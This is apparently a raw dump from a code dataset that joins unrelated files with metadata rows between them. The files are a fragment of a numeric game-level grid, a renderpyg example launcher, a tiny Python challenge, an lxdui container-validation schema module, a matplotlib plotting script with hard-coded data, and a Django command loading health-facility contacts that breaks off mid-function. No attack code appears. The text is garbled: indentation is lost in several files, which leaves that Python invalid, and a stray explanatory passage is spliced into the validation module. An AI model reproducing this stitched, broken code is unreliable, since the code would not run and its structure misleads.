7,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,9,0,0,0,0,0,0,0,0,0,0,0,8,4,4,4,7,7,0,0,33,26,26,32,0,0,0,0,0,0,0,0,0,0,10,4,4,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,33,29,29,29,32,51,0,51,0,0,0,0,0,30,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,51,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,30,28,0,0,0,0,0,0,51,0,0,0,0,0,4,4,0,0,50,0,51,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,50,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,33,32,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,34,27,27,27,31,0,0,0,0,0,0,0,0,30,26,29,32,51,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,0,51,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,28,0,0,0,37,0,0,0,7,
7,0,0,50,0,0,0,0,0,50,4,4,4,4,4,4,4,4,4,4,4,9,0,0,0,50,0,0,0,8,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,0,0,0,0,34,31,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,51,0,0,7,12,7,12,7,0,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,28,0,35,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,50,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,0,0,0,34,26,26,31,0,0,0,51,0,0,0,4,4,0,0,0,0,0,50,0,0,0,0,0,0,0,7,0,7,0,7,0,30,26,26,26,26,27,27,27,27,27,27,27,27,26,28,0,40,0,35,0,51,0,7,
7,51,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,50,0,0,51,33,26,26,32,0,0,0,0,0,51,0,4,4,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,29,29,29,29,29,29,29,29,26,26,26,26,28,51,40,0,40,0,0,0,7,
7,0,0,0,0,0,51,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,0,0,0,0,33,32,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,50,0,0,0,34,27,27,27,27,27,27,26,28,0,0,0,0,0,0,0,0,30,26,26,26,28,0,40,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,11,0,0,51,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,10,4,4,4,4,4,4,4,4,4,0,0,49,4,4,4,4,4,7,7,0,34,31,0,0,0,0,0,0,0,0,0,51,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,33,29,29,29,32,0,40,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,11,0,0,51,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,51,0,0,1,1,1,1,1,7,7,34,26,26,31,0,0,0,0,0,0,51,0,0,0,0,0,0,4,4,51,0,0,51,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,7,7,33,26,26,32,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,51,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,38,39,39,39,39,39,32,0,40,0,0,51,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,49,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,7,7,0,33,32,51,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,51,0,30,26,26,26,26,26,26,26,28,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,7,
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,"""
if __name__ == '__main__':
if len(sys.argv) > 1:
if sys.argv[1] in EXAMPLES:
locals()[sys.argv[1]](*sys.argv[2:])
else:
print('AVAILABLE EXAMPLES')
for name, desc in EXAMPLES.items():
print('{:10s}: {}'.format(name, desc))
print('\nTry python -m renderpyg.examples example_name parameters')
# Py_challenge/0.py (paulozava/Python)
def zero():
    return 2 ** 38
# app/api/schemas/container_schema.py (lxdui)
from jsonschema import validate, ValidationError
schema = {
"oneOf": [
{"$ref": "#/definitions/singleObject"}, # plain object
{
"type": "array", # array of plain objects
"items": {"$ref": "#/definitions/singleObject"}
}
],
"definitions": {
"singleObject": {
'type':'object',
'required': ['name', 'image'],
'properties':{
'name':{
'type':'string',
'description':'Container name'
},
'image':{
'type':'string',
'description':'Image alias or hash'
},
'type':{
'type':'string',
'description':'Type of instance'
},
'newName': {
'type': 'string',
'description': 'New Container name'
},
'stateful':{
'type':'boolean',
'description':'Stateful container'
},
'profiles':{
'type':'array',
'items':[
{'type':'string'}
]
},
'network': {
'type': 'array',
'items': [
{'type': 'string'}
]
},
'cpu': {
'type': 'object',
'description': 'CPU Limitation',
'required':['percentage','hardLimitation'],
'properties':{
'percentage':{
'type':'integer',
'description':'Set CPU Limitations',
'minimum':1,
'maximum':100
},
'hardLimitation':{
'type':'boolean',
'description':'Set as hard limitation (soft limitation presumed on false)'
}
}
},
'memory':{
'type': 'object',
'description': 'Memory limitation',
'required': ['sizeInMB', 'hardLimitation'],
'properties': {
'sizeInMB': {
'type': 'integer',
'description': 'Set memory limitation',
'minimum': 32
},
'hardLimitation':{
'type':'boolean',
'description':'Set as hard limitation (soft limitation presumed on false)'
}
}
},
'autostart':{
'type':'boolean',
'description':'autostart instance'
},
'description': {
'type': 'string',
'description': 'Description instance'
}
}
}
}
}
set_cpu_limit_schema = {
"oneOf": [
{"$ref": "#/definitions/singleObject"}, # plain object
{
"type": "array", # array of plain objects
"items": {"$ref": "#/definitions/singleObject"}
}
],
"definitions": {
"singleObject": {
'type':'object',
'required': ['name', 'image'],
'properties':{
'name':{
'type':'string',
'description':'Container name'
},
'image':{
'type':'string',
'description':'Image alias or hash'
},
'type':{
'type':'string',
'description':'Type of instance'
},
'newName': {
'type': 'string',
'description': 'New Container name'
},
'stateful':{
'type':'boolean',
'description':'Stateful container'
},
'profiles':{
'type':'array',
'items':[
{'type':'string'}
]
},
'network': {
'type': 'array',
'items': [
{'type': 'string'}
]
},
'cpu': {
'type': 'object',
'description': 'CPU Limitation',
                'required': ['cores'],
'properties':{
'cores':{
'type':'integer',
'description':'Set the number of CPU cores',
'minimum':1
},
}
},
'memory':{
'type': 'object',
'description': 'Memory limitation',
'required': ['sizeInMB', 'hardLimitation'],
'properties': {
'sizeInMB': {
'type': 'integer',
'description': 'Set memory limitation',
'minimum': 32
},
'hardLimitation':{
'type':'boolean',
'description':'Set as hard limitation (soft limitation presumed on false)'
}
}
},
'autostart':{
'type':'boolean',
'description':'autostart instance'
},
'description': {
'type': 'string',
'description': 'Description instance'
}
}
}
}
}
copyMoveSchema = {
"oneOf": [
{"$ref": "#/definitions/singleObject"}, # plain object
],
"definitions": {
"singleObject": {
'type':'object',
'required': ['newContainer'],
'properties':{
'newContainer':{
'type':'string',
'description':'newContainer (name)'
}
}
}
}
}
exportSchema = {
"oneOf": [
{"$ref": "#/definitions/singleObject"}, # plain object
],
"definitions": {
"singleObject": {
'type':'object',
'required': ['imageAlias'],
'properties':{
'imageAlias':{
'type':'string',
'description':'image (alias)'
}
}
}
}
}
def doValidateImageExport(payload):
    """Return None on success, else the ValidationError."""
    try:
        validate(payload, exportSchema)
        return None
    except ValidationError as e:
        return e
def doValidateCloneMove(payload):
    """Return None on success, else the ValidationError."""
    try:
        validate(payload, copyMoveSchema)
        return None
    except ValidationError as e:
        return e
def doValidate(payload, setCPU=False):
    """Validate against the CPU-limit schema when setCPU is True,
    otherwise against the container schema; return None on success,
    else the ValidationError."""
    try:
        if setCPU:
            validate(payload, set_cpu_limit_schema)
        else:
            validate(payload, schema)
        return None
    except ValidationError as e:
        return e
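All three validators share the same pattern: `jsonschema.validate` raises `ValidationError` on bad input, and the wrapper turns that exception into a return value. A minimal, stand-alone sketch of that pattern (the schema and names here are illustrative copies, not part of the module):

```python
from jsonschema import validate, ValidationError

# stand-alone copy of the export schema's core constraint
demo_schema = {
    "type": "object",
    "required": ["imageAlias"],
    "properties": {"imageAlias": {"type": "string"}},
}

def check(payload, schema):
    """Return None when payload validates, else the ValidationError."""
    try:
        validate(payload, schema)
        return None
    except ValidationError as e:
        return e

ok = check({"imageAlias": "xenial"}, demo_schema)
bad = check({}, demo_schema)  # missing required key
```

Callers then branch on the return value (`if err is not None: ...`) instead of wrapping every call site in try/except.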
| 31.644351 | 102 | 0.344837 | 390 | 7,563 | 6.671795 | 0.194872 | 0.061491 | 0.096849 | 0.047656 | 0.805534 | 0.79362 | 0.79362 | 0.79362 | 0.777863 | 0.744043 | 0 | 0.002541 | 0.531667 | 7,563 | 238 | 103 | 31.777311 | 0.732072 | 0.012826 | 0 | 0.627706 | 0 | 0 | 0.293069 | 0.020914 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012987 | false | 0 | 0.004329 | 0 | 0.04329 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6758251db54d2e02c07dd2a8d4fdbaeb61ef3c0d | 9,345 | py | Python | mattest.py | lj-1996907/lj | 0ecb42bfda4af157d968bda0e712647113a5367d | [
"MIT"
] | null | null | null | mattest.py | lj-1996907/lj | 0ecb42bfda4af157d968bda0e712647113a5367d | [
"MIT"
] | null | null | null | mattest.py | lj-1996907/lj | 0ecb42bfda4af157d968bda0e712647113a5367d | [
"MIT"
] | null | null | null | #导入包
import matplotlib.pyplot as plt
import numpy as np
# enable rendering of Chinese characters (SimHei font)
from pylab import *
mpl.rcParams['font.sans-serif'] = ['SimHei']
# create data
#x_data = np.linspace(-1, 1, 100)
#y1 = np.sin(x)
#y2 = np.cos(x)
x_data = ['0.01', '0.01', '0.02', '0.02', '0.03', '0.04', '0.04', '0.05', '0.05', '0.06', '0.07', '0.07', '0.08', '0.09', '0.09', '0.10', '0.10', '0.11', '0.12', '0.12', '0.13', '0.13', '0.14', '0.15', '0.15', '0.16', '0.16', '0.17', '0.18', '0.18', '0.19', '0.20', '0.20', '0.21', '0.21', '0.22', '0.23', '0.23', '0.24', '0.24', '0.25', '0.25', '0.26', '0.26', '0.27', '0.27', '0.28', '0.29', '0.29', '0.30', '0.30', '0.31', '0.32', '0.32', '0.33', '0.34', '0.34', '0.35', '0.35', '0.36', '0.37', '0.37', '0.37', '0.38', '0.38', '0.39', '0.40', '0.40', '0.41', '0.41', '0.41', '0.42', '0.43', '0.43', '0.44', '0.45', '0.45', '0.46', '0.46', '0.47', '0.48', '0.48', '0.49', '0.49', '0.50', '0.51', '0.51', '0.52', '0.52', '0.53', '0.54', '0.54', '0.55', '0.55', '0.55', '0.55', '0.56', '0.57', '0.57', '0.57', '0.58', '0.59', '0.59', '0.60', '0.60', '0.61', '0.62', '0.62', '0.63', '0.63', '0.64', '0.65', '0.65', '0.65', '0.66', '0.66', '0.66', '0.66', '0.67', '0.67', '0.68', '0.68', '0.68', '0.69', '0.70', '0.70', '0.70', '0.71', '0.71', '0.71', '0.72', '0.73', '0.73', '0.74', '0.74', '0.74', '0.75', '0.75', '0.76', '0.76', '0.76', '0.77', '0.77', '0.77', '0.77', '0.78', '0.79', '0.79', '0.79', '0.79', '0.80', '0.80', '0.80', '0.80', '0.81', '0.81', '0.81', '0.81', '0.82', '0.82', '0.82', '0.82', '0.83', '0.84', '0.84', '0.84', '0.84', '0.85', '0.85', '0.85', '0.85', '0.85', '0.85', '0.85', '0.86', '0.86', '0.86', '0.86', '0.86', '0.86', '0.86', '0.86', '0.86', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.87', '0.88', '0.88', '0.88', '0.89', '0.89', '0.89', '0.89', '0.89', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.91', '0.91', '0.91', '0.91', '0.91', '0.91', '0.91', '0.91', '0.92', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', '0.93', 
'0.93', '0.93', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.95', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', 
'0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96']
y_data = ['1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '1.00', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.98', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.96', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.97', '0.96', '0.95', '0.95', '0.95', '0.95', '0.95', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.94', '0.95', '0.95', '0.95', '0.95', '0.94', '0.94', '0.94', '0.93', '0.92', '0.92', '0.92', '0.92', '0.92', '0.91', '0.91', '0.91', '0.90', '0.91', '0.91', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.90', '0.89', '0.89', '0.89', '0.89', '0.89', '0.89', '0.88', '0.88', '0.88', '0.88', '0.87', '0.87', '0.87', '0.87', '0.87', '0.86', '0.86', '0.86', '0.85', '0.85', '0.84', '0.84', '0.84', '0.84', '0.83', '0.83', '0.84', '0.84', '0.83', '0.83', '0.83', '0.82', '0.82', '0.81', '0.81', '0.81', '0.80', '0.81', '0.80', '0.80', '0.79', '0.79', '0.78', '0.78', '0.77', '0.77', '0.77', '0.77', '0.76', '0.76', '0.76', '0.75', '0.75', '0.74', '0.74', '0.74', '0.73', '0.73', '0.73', '0.73', '0.72', '0.72', '0.71', '0.71', '0.71', '0.70', '0.70', '0.70', '0.69', '0.69', '0.69', '0.68', '0.68', '0.68', '0.68', '0.68', '0.68', '0.68', '0.68', '0.67', '0.67', '0.67', '0.67', '0.67', '0.66', '0.66', '0.66', '0.65', '0.65', '0.65', '0.65', '0.65', '0.65', '0.65', '0.64', '0.64', '0.64', '0.64', '0.64', '0.64', '0.64', '0.64', '0.63', '0.63', '0.63', '0.63', '0.62', '0.62', '0.62', '0.62', '0.62', 
'0.61', '0.61', '0.61', '0.61', '0.61', '0.61', '0.60', '0.60', '0.60', '0.60', '0.59', '0.59', '0.59', '0.59', '0.59', '0.58', '0.58', '0.58', '0.58', '0.57', '0.57', '0.57', '0.57', '0.57', '0.56', '0.56', '0.56', '0.56', '0.56', '0.55', '0.55', '0.55', '0.55', '0.55', '0.54', '0.54', '0.54', '0.54', '0.54', '0.53', '0.53', '0.53', '0.53', '0.53', '0.53', '0.53', '0.52', '0.52', '0.52', '0.52', '0.52', '0.52', '0.51', '0.51', '0.51', '0.51', '0.51', '0.50', '0.50', '0.50', '0.50', '0.50', '0.50', '0.50', '0.49', '0.49', '0.49', '0.49', '0.49', '0.49', '0.48', '0.48', '0.48', '0.48', '0.48', '0.48', '0.48', '0.47', '0.47', '0.47', '0.47', '0.47', '0.47', '0.47', '0.46', '0.46', '0.46', '0.46', '0.46', '0.46', '0.46', '0.45', '0.45', '0.45', '0.45', '0.45', '0.45', '0.45', '0.45', '0.44', '0.44', '0.44', '0.44', '0.44', '0.44', '0.44', '0.44', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.43', '0.42', '0.42', '0.42', '0.42', '0.42', '0.42', '0.42', '0.42', '0.42', '0.41', '0.41', '0.41', '0.41', '0.41', '0.41', '0.41', '0.41', '0.41', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.40', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.39', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.38', '0.37', '0.38', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.37', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.36', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.35', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.34', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.33', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', '0.32', 
'0.32', '0.32', '0.32', '0.32', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.31', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.30', '0.29']
# create the figure window
plt.figure(num=3, figsize=(5, 5))
# set the axis limits
plt.xlim((-0.1, 1.1))
plt.ylim((-0.1, 1.1))
# set the axis labels
plt.xlabel('xxxxxxxxxxx')
plt.ylabel('yyyyyyyyyyy')
# set the axis ticks
my_x_ticks = np.arange(0, 1.1, 0.2)
my_y_ticks = np.arange(0, 1.1, 0.2)
plt.xticks(my_x_ticks)
plt.yticks(my_y_ticks)
# plot curve 1
# plt.plot(x, y1)
# x_data / y_data were built as string lists, which matplotlib treats as
# categorical data; convert to floats so the numeric axis limits above apply
plt.plot([float(v) for v in x_data], [float(v) for v in y_data],
         color='red', linewidth=2.0, linestyle='-')
# plot curve 2
# plt.plot(x, y2, color='blue', linewidth=5.0, linestyle='--')
# render the figure
plt.show()
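Because the data lists above hold strings rather than numbers, they need coercion before any numeric plotting or arithmetic. NumPy can coerce a whole list in one call, which scales better than per-element conversion (a sketch with small sample values, independent of the script above):

```python
import numpy as np

# string lists like x_data / y_data above coerce cleanly in one call;
# the result is a float64 array usable with numeric axis limits
x = np.asarray(['0.01', '0.02', '0.94'], dtype=float)
y = np.asarray(['1.00', '0.98', '0.30'], dtype=float)
```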
| 217.325581 | 4,314 | 0.395292 | 2,282 | 9,345 | 1.613059 | 0.069676 | 0.110839 | 0.146699 | 0.216789 | 0.833741 | 0.784298 | 0.784298 | 0.703613 | 0.693833 | 0.63461 | 0 | 0.400737 | 0.128411 | 9,345 | 42 | 4,315 | 222.5 | 0.051197 | 0.02076 | 0 | 0 | 0 | 0 | 0.4785 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.176471 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
677fcaae7378b64be86f84466e5e40226a65f839 | 11,354 | py | Python | data/management/commands/load_facility_contacts.py | uonafya/mfl_api | 379310b9b56cde084620f1f2dbfe4c6d7c1de47b | [
"MIT"
] | null | null | null | data/management/commands/load_facility_contacts.py | uonafya/mfl_api | 379310b9b56cde084620f1f2dbfe4c6d7c1de47b | [
"MIT"
] | null | null | null | data/management/commands/load_facility_contacts.py | uonafya/mfl_api | 379310b9b56cde084620f1f2dbfe4c6d7c1de47b | [
"MIT"
] | 4 | 2018-07-26T05:53:06.000Z | 2021-07-17T14:30:09.000Z | import os
import json
from common.models import Contact, ContactType
from facilities.models import (
Facility, FacilityContact, Officer, OfficerContact
)
from users.models import MflUser
from django.core.management import BaseCommand
from django.conf import settings
system_user = MflUser.objects.get(email='system@ehealth.or.ke')
class Command(BaseCommand):
def handle(self, *args, **kwargs):
# facility email contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/email/0018_facility_emails_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='EMAIL')
for record in records:
            contact_value = record.get('contact')
            contact, created = Contact.objects.get_or_create(
                contact=contact_value,
                contact_type=email_type
            )
# facility email contacts linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/email/0019_facility_emails_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
mobile_type = ContactType.objects.get(name='EMAIL')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=mobile_type
)
facility = record.get('facility').get('code')
            try:
                facility_obj = Facility.objects.get(code=facility)
                print(FacilityContact.objects.get_or_create(
                    contact=contact, facility=facility_obj,
                    created_by=system_user, updated_by=system_user))
            except Facility.DoesNotExist:
                print("The requested facility does not exist")
# officer email contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/email/0030_officer_email_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='EMAIL')
for record in records:
            contact_value = record.get('contact')
            contact, created = Contact.objects.get_or_create(
                contact=contact_value,
                contact_type=email_type
            )
# officer email linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/email/0031_officer_email_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='EMAIL')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=email_type
)
officer = record.get('officer')
if officer:
officer = officer.get('name')
                try:
                    officer_obj = Officer.objects.filter(name=officer)
                    print(OfficerContact.objects.get_or_create(
                        contact=contact, officer=officer_obj[0],
                        created_by=system_user, updated_by=system_user))
                except IndexError:
                    print("The requested officer does not exist")
            else:
                print("Officer key is missing")
# facility fax contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/fax/0022_facility_fax_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='FAX')
for record in records:
            contact_value = record.get('contact')
            contact, created = Contact.objects.get_or_create(
                contact=contact_value,
                contact_type=email_type
            )
# facility fax contacts linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/fax/0023_facility_fax_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
mobile_type = ContactType.objects.get(name='FAX')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=mobile_type
)
facility = record.get('facility').get('code')
            try:
                facility_obj = Facility.objects.get(code=facility)
                print(FacilityContact.objects.get_or_create(
                    contact=contact, facility=facility_obj,
                    created_by=system_user, updated_by=system_user))
            except Facility.DoesNotExist:
                print("The requested facility does not exist")
# facility landline contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/landline/0020_facility_landline_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='LANDLINE')
for record in records:
            contact_value = record.get('contact')
            contact, created = Contact.objects.get_or_create(
                contact=contact_value,
                contact_type=email_type
            )
# facility landline contacts linked
file_path = os.path.join(
